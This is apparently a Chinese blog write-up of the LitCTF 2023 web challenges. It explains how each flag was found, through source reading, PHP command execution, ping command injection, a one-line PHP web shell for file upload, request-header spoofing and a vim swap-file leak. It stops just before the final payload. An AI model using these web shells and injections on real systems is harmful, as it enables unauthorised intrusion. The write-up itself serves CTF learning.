【2023】LitCTF

2024-06-11 00:44
文章标签 2023 litctf

本文主要是介绍【2023】LitCTF,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

LitCTF2023(复现)

Web:

1、我Flag呢?

​ ctrl+u 读取源码,在最后发现了flag:

<!--flag is here flag=NSSCTF{3d5218b9-4e24-4d61-9c15-68f8789e8c48} -->

2、PHP是世界上最好的语言!!

在这里插入图片描述

​ 右边那个框下面是 RUN CODE ,结合题目是PHP,推测为RCE,先输入echo 123;看看会发生啥:发现左边输出内容出现了123,那么,直接system(“cat /flag”);成功拿到flag:flag=NSSCTF{b26d3851-52f5-4a80-9e69-6417baf49d68}

3、导弹迷踪

​ js游戏题,先看源码,这里看game.js:

MG.game = (function () {/** Constants **/var GameState = {WAIT_START: 'wait_start',STARTING:   'starting',RUNNING:    'running',FINISHED:   'finished',CRASHED:    'crashed'}var STARTING_LIVES = 5;var LEVEL_NUM_BARRIERS = 20;/** Variables **/var mState = GameState.WAIT_START;var mLives = STARTING_LIVES;var mLevel = 0;var mRemainingBarriers = 0;var mBarriersToPass = 0;var mProgress = 0.0;var mBestProgress = 0.0;/* Strings for UI ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/var getLevelString = function () {return mLevel ? 'LEVEL ' + mLevel : 'QUALIFYING LEVEL';}var Messages = {START: {title: getLevelString,text:  function () {return 'CLICK TO BEGIN';}},CRASH: {title: function () {return 'CRASHED';},text:  function () {return 'CLICK TO RETRY';}},GAME_OVER: {title: function () {return 'GAME OVER';},text:  function () {return 'CLICK TO START AGAIN';}},FINISH: {title: function () {return 'LEVEL COMPLETED';},text:  function () {if (mLevel === 6) {return 'GOT F|L|A|G {y0u_w1n_th1s_!!!}';} else {return 'CLICK TO CONTINUE';}},}};var getLevelStartVelocity   = function (level) {return 300 + 100*level;}var getLevelFinishVelocity  = function (level) {return 400 + 100*level;}var getPreLevelIdleVelocity = function (level) {return 350 + 100*level;}var getPostLevelIdleVelocity = function (level) {return 550 + 100*level;}var playCrashAnimation = function () {// TODO move drawing out of the update loop// create a copy of the explosion elementvar explosion = document.getElementById('explosion');// play the animationexplosion.firstChild.beginElement();explosion.setAttribute('visibility', 'visible');// TODO can't seem to get a callback to fire when the animation// finishes. Use timeout insteadsetTimeout(function (){var explosion = document.getElementById('explosion');explosion.setAttribute('visibility', 'hidden');}, 400);}var goWaitStartLevel = function () {MG.banner.show(Messages.START.title(), Messages.START.text());MG.util.showMouse();MG.missile.setAutopilot();MG.missile.setVelocity(getPreLevelIdleVelocity(mLevel));if (mLevel === 0) {mLives = Infinity;}mState = GameState.WAIT_START;}/****/var goRun = function () {MG.banner.hide();MG.util.hideMouse();/* TODO should the start barrier be pushed here?If so, should all of the barriers for the entire level be pushed as well? */mRemainingBarriers = LEVEL_NUM_BARRIERS;MG.barrierQueue.pushBarrier(MG.BarrierType.START);mBarriersToPass = LEVEL_NUM_BARRIERS;MG.missile.setManual();mState = GameState.STARTING;}var goFinish = function () {MG.banner.show(Messages.FINISH.title(), Messages.FINISH.text());MG.util.showMouse();MG.missile.setAutopilot();MG.missile.setVelocity(getPostLevelIdleVelocity(mLevel));mState = GameState.FINISHED;}var goCrash = function () {MG.util.showMouse();if (mLives === 0) {MG.banner.show(Messages.GAME_OVER.title(), Messages.GAME_OVER.text());} else {MG.banner.show(Messages.CRASH.title(), Messages.CRASH.text());}playCrashAnimation()mState = GameState.CRASHED;}//==========================================================================return {init: function () {var rootNode = document.getElementById('tunnel');MG.missile.init();//var wallNode;wallNode = document.createElementNS(NAMESPACE_SVG, 'g');wallNode.setAttribute('transform', 'scale(1,-1)');MG.tunnelWall.init(wallNode);rootNode.appendChild(wallNode);//var barrierQueueNode;barrierQueueNode = document.createElementNS(NAMESPACE_SVG, 'g');barrierQueueNode.setAttribute('transform', 'scale(1,-1)');MG.barrierQueue.init(barrierQueueNode);rootNode.appendChild(barrierQueueNode);//goWaitStartLevel();rootNode.setAttribute('visibility', 'visible');},update: function (dt) {MG.missile.update(dt);    MG.tunnelWall.update(dt);MG.barrierQueue.update(dt);    /* check whether the nearest barrier has been reached and whether the missile collides with it. */if (!MG.barrierQueue.isEmpty()) {if (MG.missile.getOffset() < MG.MISSILE_LENGTH && !MG.missile.isCrashed()){var barrier = MG.barrierQueue.nextBarrier();if (barrier.collides(MG.missile.getPosition().x, MG.missile.getPosition().y)) {// CRASHMG.missile.onCrash();goCrash();} else {// BARRIER PASSEDMG.barrierQueue.popBarrier();MG.missile.onBarrierPassed();// TODO this block makes loads of assumptions about stateif (mState === GameState.RUNNING|| mState === GameState.STARTING) {switch(barrier.getType()) {case MG.BarrierType.FINISH:goFinish();break;case MG.BarrierType.BLANK:break;case MG.BarrierType.START:mState = GameState.RUNNING;// FALLTHROUGHdefault:mBarriersToPass--;var startVelocity = getLevelStartVelocity(mLevel);var finishVelocity = getLevelFinishVelocity(mLevel);MG.missile.setVelocity(startVelocity+ (startVelocity - finishVelocity)* (mBarriersToPass - LEVEL_NUM_BARRIERS)/ LEVEL_NUM_BARRIERS);break;}}}}    }/* Pad the barrier queue with blank barriers so that there are barriersas far as can be seen. */while (MG.barrierQueue.numBarriers() < MG.LINE_OF_SIGHT/MG.BARRIER_SPACING) {var type = MG.BarrierType.BLANK;if (mState === GameState.RUNNING|| mState === GameState.STARTING) {mRemainingBarriers--;if (mRemainingBarriers > 0) {type = MG.BarrierType.RANDOM;} else if (mRemainingBarriers === 0) {type = MG.BarrierType.FINISH;} else {type = MG.BarrierType.BLANK;}}MG.barrierQueue.pushBarrier(type);}/* Update progress */switch (mState) {case GameState.RUNNING:mProgress = 1 - (mBarriersToPass*MG.BARRIER_SPACING + MG.missile.getOffset())/(LEVEL_NUM_BARRIERS * MG.BARRIER_SPACING);mBestProgress = Math.max(mProgress, mBestProgress);break;case GameState.FINISHED:mProgress = 1;mBestProgress = 1;break;case GameState.STARTING:mProgress = 0;break;default:break;}},updateDOM: function () {var position = MG.missile.getPosition();var offset = MG.missile.getOffset();MG.barrierQueue.updateDOM(-position.x, -position.y, offset);MG.tunnelWall.updateDOM(-position.x, -position.y, offset);},onMouseMove: function (x, y) {var windowWidth = window.innerWidth;var windowHeight = window.innerHeight;MG.missile.setTarget(x - 0.5*windowWidth, -(y - 0.5*windowHeight));},onMouseClick: function () {if (MG.banner.isFullyVisible()) {switch (mState) {case GameState.WAIT_START:goRun();break;case GameState.FINISHED:/* The player is given an infinite number of livesduring the qualifying level but these should beremoved before continuing. */if (mLevel === 0) {mLives = STARTING_LIVES;}mLevel++;mBestProgress = 0.0;goWaitStartLevel();break;case GameState.CRASHED:MG.banner.hide();MG.fog.fadeIn(function() {if (mLives === 0) {mLevel = 0;mLives = STARTING_LIVES;mBestProgress = 0.0;} else {mLives--;}MG.missile.reset();MG.barrierQueue.reset();MG.fog.fadeOut();goWaitStartLevel();});break;}}},/* Returns an integer representing the current level */getLevel: function () {return mLevel;},/* Returns a human readable string describing the current level */getLevelString: getLevelString,/* Returns the number of times the player can crash before game over. *//* If the player crashes with zero lives remaining the game ends */getNumLives: function () {return mLives;},/* Returns the progress through the level as a value between 0 and 1,where 0 is not yet started and 1 is completed. */getProgress: function () {return mProgress;       },getBestProgress: function () {return mBestProgress;}};}());

​ 然后发现重要代码:

text:  function () {if (mLevel === 6) {return 'GOT F|L|A|G {y0u_w1n_th1s_!!!}';} else {return 'CLICK TO CONTINUE';}},

​ 成功获得flag:{y0u_w1n_th1s_!!!}

4、Follow me and hack me

​ 直接hackbar传参GET:?CTF=Lit2023 POST:Challenge=i’m_c0m1ng

5、Ping:

​ 尝试ping一下127.0.0.1能通,之后尝试 ;ls 发现不行,被限制了,不过,查看网页源代码发现是前端过滤,禁用js之后就能过了,无脑 ;cat /flag拿到flag: flag=NSSCTF{1a6530af-202d-463c-b4ea-c0447db5b801}

6、1zjs:

​ 这个1z真的1点也不Ez (>_<)

​ 第一件事儿查看源码,发现文件./dist/index.umd.js

​ 在这个文件的注释中找到了一个文件:f@k3f1ag.php

​ 之后访问这个文件:

(+[![]]+[])[+[]]+(+[]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+[]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()(([]+[])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]())[!+[]+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]]((+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+!+[]])+(![]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]])()())[!+[]+!+[]+!+[]+[+[]]]+(+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[+[]]]+[+[]]+[]+(![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+(![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+(![]+[])[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[]+[+[]]+[]+[!+[]+!+[]]+[]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+[+!+[]]+[]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+(![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+[]]+[]+[+!+[]]+[]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+[!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+(![]+[])[+!+[]]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+[+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]]((+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+!+[]])

​ 把这个编码过后的东西扔到控制台中,拿到flag:“NSSCTF{0f7f6477-a502-49b1-b7fe-01b2439ab608}”

7、作业管理系统

​ 先看源码,源码最后注释里说了默认的账号和密码都是admin,直接登陆:

​ 之后我不复现了,学校校园网卡我PHP马。

​ 大致说下后续咋做:直接上传php文件,内容是:

<?php system($_POST['cmd']);?>

​ 上传成功后直接读取该文件,然后post传入一个cat /flag即可。

8、Http pro max plus

​ 这题…难蚌。

​ 先是一堆请求头绕过,直接上:

User-Agent: Chrome
Client-Ip:127.0.0.1
via:Clash.win
referer: pornhub.com

​ 之后提示访问 /wtfwtfwtfwtf.php文件

​ 访问了之后看源码又要访问/sejishikong.php文件,之后得到flag:

冲完啦?拿上你的flag赶紧走NSSCTF{714b395b-2dfd-4657-8b5b-c82d04fad401}

9、Vim yyds:

​ 访问 /.index.php.swp之后通过vim -r index.php.swp获取源码(vim泄露):

<html><head><meta charset="UTF-8"><style type="text/css">body,html {display: flex;align-items: center;justify-content: center;}div.vim {display: flex;align-content: center;vertical-align: middle;justify-content: center;}img {border: none;width: 8rem;height: auto;}h1.vim_yyds {color: #50f728;display: flex;align-items: flex-start;justify-content: center;margin-top: 50;margin-left: 5px;}h3.vim_said {color: #39c2ff;display: flex;justify-content: center;align-items: center;}br,p {font-size: 20;}</style>
</head><body><main><div class="vim"><img src="https://www.bing.com/th?id=OSAAS.7B95FA2D97CE022F5E7949F60E350A25&pid=TechQna"></img><h1 class="vim_yyds">Vim yyds</h1></div><h3 class="vim_said">队里师傅说Vim是世界上最好的编辑器,不接受反驳</h3><div class="can_can_vim"><?phperror_reporting(0);$password = "Give_Me_Your_Flag";echo "<p>can can need Vim </p>";if ($_POST['password'] === base65_encode($password)) {echo "<p>Oh You got my password!</p>";eval(system($_POST['cmd']));}?></div></main>
</body>

​ 注意这儿:

<?phperror_reporting(0);$password = "Give_Me_Your_Flag";echo "<p>can can need Vim </p>";if ($_POST['password'] === base65_encode($password)) {echo "<p>Oh You got my password!</p>";eval(system($_POST['cmd']));}?>

​ 把Give_Me_Your_Flag进行base64编码之后得到:R2l2ZV9NZV9Zb3VyX0ZsYWc=,之后POST传入,然后进行rce,payload如下:

